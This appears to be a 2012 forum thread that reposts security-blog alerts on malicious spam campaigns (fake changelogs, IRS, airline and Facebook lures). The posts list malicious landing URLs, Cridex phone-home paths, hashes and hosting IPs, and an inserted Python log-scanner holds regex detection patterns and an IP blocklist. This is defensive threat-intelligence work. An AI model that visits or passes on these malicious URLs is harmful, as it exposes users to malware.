as promised chnglog attached (Internet Explorer File)
==========
Date: Thu, 15 Nov 2012 05:43:09 -0500
From: Chaz Shea via LinkedIn [member@linkedin.com]
Subject: Re: Changelog as promised(updated)
Attachments: Changelog-12.htm
Hello,
as prmised changelog is attached (Internet Explorer File)
The malicious payload is at [donotclick]feronialopam .ru:8080/forum/links/column.php hosted on a familiar looking bunch of IP addresses that you really should block:
120.138.20.54 (Sitehost, New Zealand)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)..."
:mad:
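Several of the posts above share the same two URL shapes: the .htm attachments of the fake Changelog, "Your Flight" and "Statement" spam fetch a landing page at `<domain>:8080/forum/links/column.php`, and the dropped Cridex/Bublik samples phone home to `<ip>:8080/Ajtw/UCygrDAA/Ud+asDAA`. As an added defender-side example (not code from Dynamoo, Webroot or any other quoted blog), the script below runs those patterns, plus the hosting IPs the posts recommend blocking, over constructed proxy-log lines; the log format and the sample lines are assumptions, the indicators come from the posts.

```python
"""Scan proxy-log lines for the URL patterns recurring in the campaigns above.

Added example for this thread, not code from any of the quoted blogs. The log
format (timestamp client method url status) and the sample lines are
constructed assumptions; the path signatures and IPs are taken from the posts.
"""
import ipaddress
import re
from typing import List, NamedTuple, Tuple
from urllib.parse import urlsplit

# Paths that recur across the quoted posts:
#  - the .htm attachments of the fake Changelog/Flight/Statement spam fetch
#    <domain>:8080/forum/links/column.php (BlackHole landing page);
#  - the dropped Cridex/Bublik samples phone home to
#    <ip>:8080/Ajtw/UCygrDAA/Ud+asDAA (one post shows /AJtw/UCyqrDAA/...);
#  - the Discover/BBB lure links redirect via /detects/<name>.php.
PATH_SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("blackhole_landing", re.compile(r"^/forum/links/column\.php$")),
    ("cridex_phone_home", re.compile(r"^/ajtw/uc[a-z]{2}rdaa/ud\+asdaa$", re.I)),
    ("lure_redirect", re.compile(r"^/detects/[\w-]+\.php$")),
]

# Hosting and C2 addresses the quoted posts recommend blocking.
BLOCKLIST = {
    ipaddress.ip_address(a)
    for a in (
        "31.184.192.237", "64.202.123.3", "120.138.20.54", "200.169.13.84",
        "202.180.221.186", "203.80.16.81", "210.56.23.100", "216.24.194.66",
        "50.61.155.86",
    )
}

# Assumed log format: "<timestamp> <client-ip> <METHOD> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


class Hit(NamedTuple):
    line_no: int
    client: str
    url: str
    reasons: Tuple[str, ...]


def classify(url: str) -> List[str]:
    """Return the indicator names that a single requested URL matches."""
    parts = urlsplit(url)
    reasons = [name for name, rx in PATH_SIGNATURES if rx.search(parts.path)]
    try:
        if ipaddress.ip_address(parts.hostname or "") in BLOCKLIST:
            reasons.append("blocklisted_ip")
    except ValueError:
        pass  # a hostname rather than a literal IP: nothing to look up here
    try:
        port = parts.port
    except ValueError:  # malformed port in the URL
        port = None
    # Weak heuristic drawn from the same posts: every landing page they show
    # is a .php script on port 8080. Flag it only when nothing stronger hit.
    if not reasons and port == 8080 and parts.path.endswith(".php"):
        reasons.append("php_on_8080")
    return reasons


def scan(lines: List[str]) -> List[Hit]:
    """Parse each log line and collect those matching at least one indicator."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # unparseable line: skip rather than crash the sweep
        reasons = classify(m["url"])
        if reasons:
            hits.append(Hit(line_no, m["client"], m["url"], tuple(reasons)))
    return hits


# Constructed sample log: one client fetched the landing page and then the
# phone-home URL; the other lines are benign, a blocklisted host, and noise.
SAMPLE_LOG = [
    "2012-11-15T10:51:02Z 10.1.2.33 GET http://feronialopam.ru:8080/forum/links/column.php 200",
    "2012-11-15T10:51:09Z 10.1.2.33 GET http://210.56.23.100:8080/Ajtw/UCygrDAA/Ud+asDAA 200",
    "2012-11-15T10:52:40Z 10.1.2.57 GET http://www.example.com/forum/index.php 200",
    "2012-11-15T10:53:11Z 10.1.2.57 GET http://64.202.123.3/index.html 404",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.url}  [{', '.join(hit.reasons)}]")
```

Two hits from the same internal client within seconds (landing page, then phone-home) is the sequence to look for; the phone-home path alone is the stronger signal, since it survives the frequent domain rotation the posts describe.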
AplusWebMaster
2012-11-16, 13:43
FYI...
Malware sites to block - 16/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-161112.html
16 Nov 2012 - "Some more evil domains and IPs, connected with this spam run*. (Thanks, GFI)..."
* http://gfisoftware.tumblr.com/post/35789134771/american-express-online-merchant-system-spam
___
Bogus eFax Corporate messages serve multiple malware variants
- http://blog.webroot.com/2012/11/16/cybercriminals-spamvertise-bogus-efax-corporate-delivery-messages-serve-multiple-malware-variants/
Nov 16, 2012 - "... mass mailing millions of emails trying to trick recipients into executing malicious attachments pitched as recently arrived fax messages. Upon running the malicious executables, users are exposed to a variety of dropped malware variants in a clear attempt by the cybercriminals to add additional layers of monetization to the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/efax_corporate_email_spam_malware.png
Detection rate for the malicious executable: MD5: 16625f5ee30ba33945b807fb0b8b2f9e * ... Trojan-PSW.Win32.Tepfer.blbl
Upon execution, it attempts to connect to the following domains...
It then downloads additional malicious payload...
Phone back URL:
hxxp ://oftechnologies.co .in/update/777/img.php?gimmeImg – 130.185.73.102, AS48434 ** – Email: melody_mccarroll38 @ indyracers .com
Name Server:NS1.INVITEDNS .COM
Name Server:NS2.INVITEDNS .COM
The following malicious domain responds to the same IP: updateswindowspc .net
The following malicious domains are also known to have responded to the same IP (130.185.73.102) in the past..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/755d3ccd26b99ae2ccae8483847a2e42f8756884e1f11eb05d637d383d90362f/analysis/1352078183/
File name: eFAX.CORPORATE.exe
Detection ratio: 37/43
Analysis date: 2012-11-05
** https://www.google.com/safebrowsing/diagnostic?site=AS:48434
Diagnostic page for AS48434 (TEBYAN) - "Of the 1723 site(s) we tested on this network over the past 90 days, 86 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-11-16, and the last time suspicious content was found was on 2012-11-16... Over the past 90 days, we found 2 site(s) on this network... that appeared to function as intermediaries for the infection of 5 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 5 site(s)... that infected 6 other site(s)..."
:mad: :fear:
AplusWebMaster
2012-11-17, 21:46
FYI...
Fake J. dee Edwards / jdeeedwards .com scam
- http://blog.dynamoo.com/2012/11/j-dee-edwards-jdeeedwardscom-scam.html
17 Nov 2012 - "I'm not even certain what this scam is, but this is certainly not legitimate:
From: J. dee Edwards j.edwards @ jdeeedwards .com
Reply-To: j.edwards @ jdeeedwards .com
Date: 17 November 2012 16:29
Subject: Edwards contact
Dear Colleague,
We are working with healthcare market companies which would like to hear your opinion.
We would like you to become a member of working group and share your opinion online. Please review your full name, specialty, country and language by clicking on the link http ://www .jdeeedwards .com/contact.php?e=[redacted] or replying to the email.
Thank you for your time.
J. dee Edwards HRms
j.edwards @ jdeeedwards .com
http ://www .jdeeedwards .com
To ensure that our emails reach you, please remember to add j.edwards @ jdeeedwards .com to your email address book.
We would like to remind you that J. dee Edwards is committed to safeguarding your privacy and your personal details will not be disclosed to third parties.
If you do not wish to receive please visit: http ://jdeeedwards .com/ unsub.php?e=[redacted]
Copyright 2012 - J. dee Edwards - 20 Broadwick Street London, UK
Firstly, the email is sent to an address that ONLY spammers use, which is not a good sign. Secondly, the domain jdeeedwards .com has anonymous WHOIS details and was registered just over a month ago - the site is hosted on 54.247.87.188 (Amazon, Ireland) and looks like this:
> https://lh3.ggpht.com/-gF0CqXAXYUc/UKfWJw71UNI/AAAAAAAAAxs/HOmxzuXDSRk/s1600/jdeeedwards.png
... there used to be a company called JD Edwards, but there isn't any more**, nor is there a company called J. dee Edwards anywhere in the UK. The link in the email is some sort of signup thing, I guess it's the first part of a scam to recruit people for some sort of illegal activity.
> https://lh3.ggpht.com/-htRJx4tLeEA/UKfXPYlYHwI/AAAAAAAAAx0/6lokOiyIKrc/s400/jdeeedwards2.png
Oddly, the email address is an "optional" component, so how are they going to contact you? Maybe it's the tracking code in the link. Alternatively, you can reply by email, and this is the third suspect thing: the mailserver is on 85.206.51.81 in Lithuania (AS8764 / LIETUVOS-TELEKOMAS). AS8764* is a pretty scummy netblock according to Google*. 85.206.51.81 is also the IP address the spam was sent from. So, a non-existent company with a month-old domain sends an email to an address only spammers use, from an email server in a dodgy part of cyberspace. Whatever this is, it is some sort of scam and is definitely best avoided."
* http://www.google.com/safebrowsing/diagnostic?site=AS:8764
** https://en.wikipedia.org/wiki/JD_Edwards
"... JD Edwards, abbreviated JDE, -was- an Enterprise Resource Planning (ERP) software company..."
:mad:
AplusWebMaster
2012-11-19, 14:18
FYI...
Fake IRS "W-1" SPAM / 5.chinottoneri .com
- http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
19 Nov 2012 - "This is a new one, pretending to be from the victim's HR department with tailored fake links in the email that look like they are going to the victim's own domain. Of course, floating over the links reveals that they point to some other domain entirely. A W-1 form is a tax form of some sort from the US Internal Revenue Service.
From: Administrator [mailto:administrator @ victimdomain .com]
Sent: 19 November 2012 14:50
Subject: To All Employee's - Important Address UPDATE
To All Employee's:
The end of the year is approaching and we want to ensure every employee receives their W-1 to the correct address.
Verify that the address is correct - https ://local .victimdomain .com/details.aspx?id=[redacted]
If changes need to be made, contact HR at https ://hr.victimdomain .com/update.aspx?id=[redacted].
Administrator,
http ://victimdomain .com
In this case, the link bounces through two hacked legitimate sites to end up at [donotclick]5.chinottoneri .com/links/landing-philosophy_dry-suspende.php hosted on 50.61.155.86 (Fortress ITX, US). VirusTotal detections are pretty low*. I suspect that there are many other malicious sites on this IP; blocking it would be wise."
* https://www.virustotal.com/file/825407bd62793a320d9e573f03b70a069a6f2265e95935d3a264f3487e990e6b/analysis/1353338928/
File name: exploit.htm
Detection ratio: 3/43
Analysis date: 2012-11-19
___
Bogus IRS emails lead to malware
- http://blog.webroot.com/2012/11/19/bogus-irs-your-tax-return-appeal-is-declined-themed-emails-lead-to-malware/
Nov 19, 2012 - "In March 2012, we intercepted an IRS themed malicious campaign that was serving client-side exploits to prospective users in an attempt to drop malware on the affected hosts. This week, we intercepted three consecutive campaigns using the exact same email template used in the March campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/irs_email_spam_tax_appeal_malware.png
Unlike March 2012's campaign that used client-side exploits in an attempt to drop malware on the affected host, the last three campaigns have relied on malicious archives attached to spamvertised emails. Each has a unique MD5 and phones back to a different (compromised) command and control server.
The first sample: MD5: f56026fcc9ac2daad210da82d92f57a3 * ... Worm:Win32/Cridex.E phones back to 210.56.23.100 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS7590, Commission For Science And Technology, Pakistan).
We also have another: MD5: 532bdd2565cae7b84cb26e4cf02f42a0 ** Worm:Win32/Cridex.E that is known to have phoned back to the same IP, 128.2.172.202 :8080/37ugtbaaaaa/enmtzaaaaa/pxos/
The following MD5s are also known to have phoned back to this very same IP:
MD5: a5c8fb478ff7788609863b83079718ec ... Worm:Win32/Cridex.E
MD5: f739f99f978290f5fc9a812f2a559bbb ... Trojan.Win32.Bublik.swr
The third sample used in the IRS themed campaign: MD5: 32b4227ae379f98c1581f5cb2b184412 *** ... Worm:Win32/Cridex.E phones back to 202.143.189.180 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS23974, Ministry of education, Thailand)..."
* https://www.virustotal.com/file/41886186a4d98044cc7f5592e56d98e4dbef8a319f1ec722f55e8c90d2327d5f/analysis/1352985385/
File name: IRS_Letter.exe
Detection ratio: 36/44
Analysis date: 2012-11-15
** https://www.virustotal.com/file/4c22bbf59405ef0a22b41f4bd03461ef95a292ef2103ff91c575a59710157287/analysis/1352985520/
File name: IRS_Rejected.exe
Detection ratio: 35/44
Analysis date: 2012-11-15
*** https://www.virustotal.com/file/e72bbfd2cf1994b326890321f76c8cc6f35472689c20aace4991580d9b669cf5/analysis/1352985751/
File name: IRS-AppID.exe
Detection ratio: 36/44
Analysis date: 2012-11-15
___
Fake "Southwest Airlines" SPAM / headerandfooterprebuilt .pro
- http://blog.dynamoo.com/2012/11/southwest-airlines-spam.html
19 Nov 2012 - "This fake Southwest Airlines spam leads to malware at headerandfooterprebuilt .pro:
Date: Mon, 19 Nov 2012 19:33:04 +0000
From: "Southwest Airlines" [no-reply @luv .southwest .com]
To: [redacted]
Subject: Southwest Airlines Confirmation: 5927NI
[redacted] 2012-11-19 86KY9Z INITIAL SLC WN PHX0.00T/TFF 0.00 END AY3.50$SLC2.50 1445164773311 2013-11-22 1655 2012-11-20 Depart SAN LEONARD CITY UT (SLC) at 8:08 PM on Southwest Airlines Arrive in PHOENIX AZ (PHX) at 9:02 PM
You're all set for your traveling!
My Account | Review My Itinerary Online
Check Up Online | Check Flight Status | Change Flight | Special Offers | Hotel Deals | Car Deals
Ready for lift-off!
Thanks Southwest for your travel! You can find everything you need to know about your booking below. Happy voyage!
Upcoming Cruise: 11/20/12 - SLC - Phx Knight
The malicious payload is at [donotclick]headerandfooterprebuilt .pro/detects/quality_flyes-ticket_check.php hosted on 198.27.94.80 (OVH, US). There are probably other Bad Things on that IP address, I just can't see them yet.. blocking it would be a good precaution."
___
Fake "End of Aug. Statement Reqiured" SPAM / bamanaco .ru
- http://blog.dynamoo.com/2012/11/end-of-aug-statement-reqiured-spam.html
19 Nov 2012 - "This spam leads to malware on bamanaco .ru:
Date: Mon, 19 Nov 2012 03:55:08 -0500
From: ups [admin@ups.com]
Subject: Re: FW: End of Aug. Statement Reqiured << sp?
Attachments: Invoices-1119-2012.htm
Hallo,
as reqeusted I give you inovices issued to you per oct. 2012 ( Internet Explorer/Mozilla Firefox file)
Regards
The malicious payload is at [donotclick]bamanaco .ru:8080/forum/links/column.php hosted on the following IPs:
203.80.16.81 (MYREN, Malaysia)
216.24.196.66 (Psychz Networks, US)
These IPs have been used to deliver malware several times recently, you should block access to them if you can."
___
Rolex SPAM rolls out in time for Black Friday
- http://www.gfi.com/blog/rolex-spam-rolls-out-in-time-for-black-friday/
Nov 19, 2012 - "... no surprise that online shenanigans abound when big holidays and major events are just around the corner. What remains to be seen are the forms of these shenanigans we ought to expect to see online and in our inboxes. This Thanksgiving and Black Friday week, cyber criminals did not disappoint. We found this particular email spam in user inboxes these last few days:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/rolex-email-231x300.png
From: Designer Watches by LR (could be random, too)
To: {random}
Subject: Start Black Friday today
Message body:
BLACK FRIDAY EVERY DAY UNTIL NOVEMBER 23RD!
The best quality watch replicas on PLANET EARTH!
The lowest priced high-end watches on the PLANET!
www(dot)LRblackfridaytoday(dot)com
BLACK FRIDAY HAS STARTED!
Black Friday every day until November 23!
All items reduced by 25-50% as of TODAY.
Over 25,000 exact watch-copies have been reduced until Friday November 23rd.
There plenty of time to get the watch of your dreams but we recommend doing it as soon as possible.
This will ensure INSTOCK availability and fast delivery.
NOTE: BLACK FRIDAY PRICES ARE AVAILABLE ON INSTOCK ITEMS ONLY!
Currently every watch model is INSTOCK and ready to ship within 1 hour.
THESE ARE NOT CHEAP CHINA STOCK KNOCK-OFFS:
These are hand crafted high-end watch-copies.
These are made using identical parts and materials.
These are tested inside and out to be identical.
There is no difference between our watch-copies and the originals!
www(dot)LRblackfridaytoday(dot)com
Clicking either the image or the URLs on the email body leads users to the LRblackfridaytoday domain, which looks like this:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/rolex-replica-300x274.png
The domain resolves to an IP in the Czech Republic that does not only have a bad reputation but also uses a network that Google* warned us about. Our friends at Symantec** have also mentioned several variants of this spam mail (and published other Black Friday-related threats) that you might want to check out, too. Fake Rolex replica spammers, like fake pharma scammers, promise little luxuries but often never deliver. Giving out your credit card information to spammed sites is a sure way of putting yourself in potential debt with no “luxury replica item” in return..."
* http://www.google.com/safebrowsing/diagnostic?site=AS:6830
** http://www.symantec.com/connect/blogs/thanksgiving-black-friday-spammers-radar
___
More here (also links to Screenshots):
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-3/
Nov 19, 2012
:mad:
AplusWebMaster
2012-11-20, 15:17
FYI...
Malware sites to block 20/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-201112.html
20 Nov 2012 - "This huge pile of malware sites and IPs is connected with these malicious emails being distributed in the Netherlands. All the sites are interconnected through their black hat infrastructure and are either being used for malware distribution or some other evil activity:
If you want to block those Russian hosts more widely, perhaps use the following list:
(More detail at the dynamoo URL above.)
___
Fake "Don't forget about meeting tomorrow" SPAM / hamasutra .ru
- http://blog.dynamoo.com/2012/11/dont-forget-about-meeting-tomorrow-spam.html
20 Nov 2012 - "This spam leads to malware on hamasutra .ru:
From: Lula Stevens [... JolieWright @ shaw .ca]
Sent: 20 November 2012 05:57
Subject: Don't forget about meeting tomorrow
Don't forget this report for meeting tomorrow.
See attached file. (Internet Explorer file)
In the sample I have seen, there is an attachment called Report.htm with some obfuscated javascript leading to a malicious payload at [donotclick]hamasutra .ru:8080/forum/links/column.php hosted on the following IPs:
82.165.193.26 (1&1, Germany)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
216.24.196.66 (Psychz Networks, US)
Plain list:
82.165.193.26
202.180.221.186
203.80.16.81
216.24.196.66
___
Fake ‘Copies of Missing EPLI Policies’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/20/copies-of-missing-epli-policies-themed-emails-lead-to-black-hole-exploit-kit/
Nov 20, 2012 - "Attempting to achieve a higher click-through rate for their exploits and malware serving malicious campaign, cybercriminals are currently spamvertising millions of emails attempting to trick users into thinking they’ve become part of a private conversation about missing EPLI policies (Employment practices liability). In reality, clicking on any of the links in the oddly formulated email will expose them to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/missing_epli_policies_email_spam_exploits_malware.png
... Sample client-side exploits serving URL: hxxp ://monacofrm.ru :8080/forum/links/column.php
Malicious domain name reconnaissance:
monacofrm .ru – 202.180.221.186, AS24496; 203.80.16.81, AS24514; 216.24.194.66, AS40676
Name server: ns1.monacofrm .ru – 62.76.178.233
Name server: ns2.monacofrm .ru – 41.168.5.140
Name server: ns3.monacofrm .ru – 132.248.49.112
Name server: ns4.monacofrm .ru – 209.51.221.247 ...
We also know that on 2012-11-12 10:58:07, the following client-side exploits serving domain was also responding to the same IP (202.180.221.186) - hxxp ://canadianpanakota .ru:8080/forum/links/column.php. Upon successful client-side exploitation, this URL dropped MD5: 532bdd2565cae7b84cb26e4cf02f42a0 * ... Worm:Win32/Cridex.E.
We’re also aware of two more client-side exploits serving domains responding to the same IP (202.180.221.186) on 2012-11-15 19:49:33 – hxxp ://investomanio .ru/forum/links/public_version.php, and on the 2012-11-15 04:40:06 – hxxp ://veneziolo .ru/forum/links/column.php...
* https://www.virustotal.com/file/a0703de85f59b501935eff571a6c6b6f9e30c03c703a678abe699019e2c1eb2b/analysis/
File name: contacts.exe.x-msdownload
Detection ratio: 33/44
Analysis date: 2012-11-13
(More detail at the webroot URL above.)
:mad: :mad: :fear:
AplusWebMaster
2012-11-21, 01:10
FYI...
Linux Rootkit doing iFrame Injections
- https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
Nov 19, 2012 - "... an interesting piece of Linux malware came up on the Full Disclosure mailing-list*... not only because it targets 64-bit Linux platforms and uses advanced techniques to hide itself, but primarily because of the unusual functionality of infecting the websites hosted on attacked HTTP server - and therefore working as a part of drive-by download scenario... The malware module was specially designed for the kernel version 2.6.32-5-amd64, which happens to be the latest kernel used in 64-bit Debian Squeeze. The binary is more than 500k, but its size is due to the fact that it hasn't been stripped (i.e. it was compiled with the debugging information). Perhaps it's still in the development stage, because some of the functions don’t seem to be fully working or they are not fully implemented yet. The malware ensures its startup by adding an entry to the /etc/rc.local script... Then it extracts the memory addresses of several kernel functions and variables and stores them in memory for later use... the malicious iFrames are injected into the HTTP traffic by direct modification of the outgoing TCP packets... In order to obtain the actual injection payload, the malware connects to the C&C server using an encrypted password for authentication... the malicious server is still active and it hosts other *NIX based tools, such as log cleaners... So far, in most of the drive-by download scenarios an automated injection mechanism is implemented as a simple PHP script. In the case described above, we are dealing with something far more sophisticated - a kernel-mode binary component that uses advanced hooking techniques to ensure that the injection process is more transparent and low-level than ever before. This rootkit, though it's still in the development stage, shows a new approach to the drive-by download schema and we can certainly expect more such malware in the future.
An excellent, detailed analysis of this rootkit was recently posted on CrowdStrike blog**."
* http://seclists.org/fulldisclosure/2012/Nov/94
** http://blog.crowdstrike.com/2012/11/http-iframe-injecting-linux-rootkit.html
___
- http://h-online.com/-1753969
21 Nov 2012
___
- http://atlas.arbor.net/briefs/index#2007317889
64-bit Linux Rootkit Doing iFrame Injections
Nov 20, 2012
New development on a Linux-based rootkit shows increased attention from cybercriminals.
Analysis: It's been a while since public Linux rootkit activity has raised much attention. This particular rootkit is poorly designed; however, it is/was effective at delivering malicious links to website visitors, its primary goal. Several write-ups on the threat exist, including a post to the Full-Disclosure list, the Kaspersky blog and the CrowdStrike blog, providing plenty of analysis material to help admins detect this threat. Arbor is interested to hear if any customers have found this threat on their hosting platforms.
Source: http://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
:mad:
AplusWebMaster
2012-11-21, 15:58
FYI...
Bogus ‘MS License Orders’ serve client-side exploits and malware
- http://blog.webroot.com/2012/11/21/cybercriminals-spamvertise-bogus-microsoft-license-orders-serve-client-side-exploits-and-malware/
Nov 21, 2012 - "Cybercriminals are currently mass mailing millions of emails impersonating Microsoft Corporation in an attempt to trick users into clicking on a link in a -bogus- ‘License Order’ confirmation email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/microsoft_windows_email_spam_exploits_malware.png
... Sample client-side exploit served: CVE-2010-0188
Malicious domain name reconnaissance:
fidelocastroo .ru – 209.51.221.247; 203.80.16.81
Name server: ns1.fidelocastroo .ru – 85.143.166.170
Name server: ns2.fidelocastroo .ru – 132.248.49.112
Name server: ns3.fidelocastroo .ru – 84.22.100.108
Name server: ns4.fidelocastroo .ru – 213.251.171.30 ...
(Full detail available at the webroot URL above.)
___
5.estasiatica .com / 66.228.57.248
- http://blog.dynamoo.com/2012/11/5estasiaticacom-6622857248.html
20 Nov 2012 - "It looks like another variant of this* malicious spam run could be brewing on 5.estasiatica .com / 66.228.57.248 (Linode, US). A bit of pre-emptive blocking might be in order..."
* http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
:mad:
AplusWebMaster
2012-11-22, 13:02
FYI...
Fake ‘Payroll Account Cancelled by Intuit’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/22/cybercriminals-resume-spamvertising-payroll-account-cancelled-by-intuit-themed-emails-serve-client-side-exploits-and-malware/
Nov 22, 2012 - "Cybercriminals have resumed spamvertising the Intuit Direct Deposit Service Informer themed malicious emails, which we intercepted and profiled earlier this month. While using an identical email template, the cybercriminals behind the campaign have introduced new client-side exploits serving domains, which ultimately lead to the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/intuit_direct_deposit_service_email_spam_exploits_malware_01.png
... Sample client-side exploits served: CVE-2010-0188
Malicious domain name reconnaissance:
cosmic-calls .net – 108.171.243.172, AS40676 – Email: samyidea @aol .com, used to respond to 75.127.15.39
108.171.243.172 also resolves to lanthaps .com (used to respond to 199.167.31.121) – Email: A1kmmm @ gmail .com
Name Server: NS1.CHELSEAFUN .NET
Name Server: NS2.CHELSEAFUN .NET
... Upon successful client-side exploitation, the campaign drops MD5: 896bae2880071c3a63d659a157d5c16f * ... Worm:Win32/Cridex.E.
Upon execution, the sample phones back to hxxp ://203.172.238.18 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ (AS23974, Ministry of Education, Thailand). The following domain has also responded to this IP in the past: phnomrung .com (Name server: ns1 .banbu.ac .th – currently responding to 208.91.197.101)...
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/cf4a54984edb86bec14f7909ae88076b68864148e47c32903dd4afaccb34871a/analysis/
File name: 896bae2880071c3a63d659a157d
Detection ratio: 33/44
Analysis date: 2012-11-17
___
Malware sites to block 22/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-221112.html
22 Nov 2012 - "This is part of a cluster of malware sites being promoted through finance related spam, spotted by GFI Labs here* and on this blog here**.
* http://gfisoftware.tumblr.com/post/36222532206/key-bank-secure-message-spam
** http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
Plain list of IPs and domains for copy-and-pasting: ..."
___
Facebook SPAM / ceredinopl .ru
- http://blog.dynamoo.com/2012/11/facebook-spam-ceredinoplru.html
22 Nov 2012 - "This fake Facebook (or is it Habbo?) spam leads to malware on ceredinopl .ru:
Date: Thu, 22 Nov 2012 01:30:38 -0700
From: Habbo Hotel [auto-contact @ habbo .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
REFUGIA MERRILL has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]ceredinopl .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
208.87.243.131 (Psychz Networks, US)
216.24.196.66 (Psychz Networks, US)
The following IPs and domains are all connected: ..."
:mad:
AplusWebMaster
2012-11-23, 14:37
FYI...
Malware sites to block 23/11/12
- http://blog.dynamoo.com/2012/11/malware-sites-to-block-231112.html
23 November 2012 - "This bunch of IPs and domains are being used in a series of fairly well-targeted attacks involving malicious spam messages that look like they come from real financial organisations (such as this one*). The payload is apparently "Ponyloader".
* http://blog.dynamoo.com/2012/11/w-1-spam-5chinottonericom.html
The domains seem to be legitimate but hacked, and in some cases the server infrastructure also looks like it is something legitimate that has been taken over by the bad guys. However, the chances are that you are more likely to see these sites as the result of a malicious spam run rather than anything else, and you should consider blocking them...
Plain list of IPs for copy-and-pasting: ..."
(More detail at the dynamoo URL above.)
___
Malware sites to (block) 23/11/12 - Part 2
- http://blog.dynamoo.com/2012/11/malware-sites-to-blog-231112-part-2.html
23 November 2012 - "Some more bad domains, closely related to this malicious spam run, spotted at the GFI blog*, hosted on 192.155.83.191 (Linode, US) ..."
* http://gfisoftware.tumblr.com/post/36352406093/comerica-bank-secure-message-spam
___
An Overview of Exploit Packs (kits)...
- http://contagiodump.blogspot.de/2010/06/overview-of-exploit-packs-update.html
"... Updates/new entries for 13 packs have been added (see exploit listing)..."
CVE's also listed.
____
Bogus Tsunami Warning leads to Arcom RAT
- http://blog.trendmicro.com/trendlabs-security-intelligence/tsunami-warning-leads-to-arcom-rat/
Nov 23, 2012 - "... the website “Hoax Slayer”* pointed us to a spammed email message that warns users of a Tsunami and encourages them to click on a link to watch a video. The article, which the cybercriminals made to look like it came from “news.com.au”, claims that experts have predicted that a Tsunami will hit Australia on New Year’s Eve...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/11/htmlcontent_spam.jpg
The “watch now” link connects to {BLOCKED}be.us and downloads a file that pretends to be an AVI in a ZIP archive. In actuality, “sunami_australian_agency_of_volcanology_and_seismology.avi.pif” is a malicious file which Trend Micro detects as BKDR_DOKSTORMC.A... It remains unclear who is behind the attack and what the motivation may be... The malware is a Remote Access Trojan (RAT), known as Arcom RAT, and it is sold on underground forums for $2000.00... There are also free cracked versions available for download from a variety of sources. Arcom RAT was reportedly authored by “princeali” who has been actively coding RATs and malware for about a decade. The alias “princeali” is connected to a group known as NuclearWinterCrew which created the infamous NuclearRAT..."
* http://www.hoax-slayer.com/tsunami-warning-malware.shtml
Nov 19, 2012
___
Bogus Prize Offers on Facebook - 'Like and Share To Win'
- http://www.hoax-slayer.com/facebook-share-win.shtml
Nov 22, 2012 - "Outline: Various messages distributed on Facebook claim that users can win expensive prizes such as Apple products or designer headphones just by liking and sharing a Facebook Page.
Analysis: A great many of these supposed prize offers are totally bogus. The "promotions" are created primarily to artificially inflate the number of "likes" gained by the offending Facebook Page and to promote the page further by way of shared posts and images. Those who participate will -never- receive the promised prize. In some cases, the perpetrators of these fake promotions may also try to trick people into divulging their personal information... don't give these unscrupulous people what they want! Don't "like" their bogus Pages. Don't be tricked into spamming your friends with their fake promotions by sharing their pictures. Do not send your personal information to these people in the vain hope of winning a prize. Before entering any type of promotion or prize draw always take a closer look. If it seems suspect or dodgy, give it a miss."
___
Some evil on 5.135.192.16/30
- http://blog.dynamoo.com/2012/11/some-evil-on-51351921630.html
23 Nov 2012 - "It looks like there are a set of exploit sites in the range 5.135.192.16/30 serving up TrueType exploits (such as CVE-2011-3402) which is being pushed by a malicious URL at [donotclick]mwko.zsomteltepngs .info/40c0dee71a9b9d715539b7d56c3d5f23.eot . The potentially malicious sites in this range include:
If you're interested in blocking whole domains rather than subdomains then here's a list you can use:
..."
> https://www.google.com/safebrowsing/diagnostic?site=AS:16276
